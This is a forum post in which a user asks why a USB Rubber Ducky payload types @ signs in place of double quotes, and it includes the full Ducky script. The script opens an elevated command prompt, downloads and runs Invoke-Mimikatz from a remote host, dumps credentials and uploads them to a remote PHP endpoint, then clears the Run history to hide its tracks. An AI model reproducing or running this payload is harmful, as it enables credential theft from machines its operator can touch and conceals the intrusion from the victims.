Jump to content

@ sign instead of "


mule
 Share

Recommended Posts

This is what the rubber ducky is outputting to my CMD window:

Notice that @ signs have been subbed for " marks. I've tried changing the language from GB to US, but that doesn't seem to help either

powershell @IEX (New-Object Net.WebClient).DownloadString('http://someplace.com/im.ps1'); $output = Invoke-Mimikatz -DumpCreds; (New-Object Net.WebClient).UploadString('https://someplace.com/rx.php', $output)@

Here's the contents of the file that I pass to ducktools (python.exe ducktools.py -e -l us mimi.txt inject1.bin) to get my inject.bin file

Any help would be greatly appreciated!

Mimi.txt file contents:

REM Title: Invoke mimikatz and send creds to remote server
REM Author: Hak5Darren Props: Mubix, Clymb3r, Gentilkiwi
DELAY 1000
REM Open an admin command prompt 
GUI r
DELAY 500
STRING powershell Start-Process cmd -Verb runAs
ENTER
DELAY 2000
ALT y
DELAY 1000
REM Obfuscate the command prompt
REM STRING mode con:cols=18 lines=1
ENTER
REM STRING color FE
ENTER
REM Download and execute Invoke Mimikatz then upload the results
STRING powershell "IEX (New-Object Net.WebClient).DownloadString('http://someplace.com/im.ps1'); $output = Invoke-Mimikatz -DumpCreds; (New-Object Net.WebClient).UploadString('https://someplace.com/rx.php', $output)"
ENTER
DELAY 15000
REM Clear the Run history and exit
STRING powershell Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue
ENTER
STRING exit
ENTER

 

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...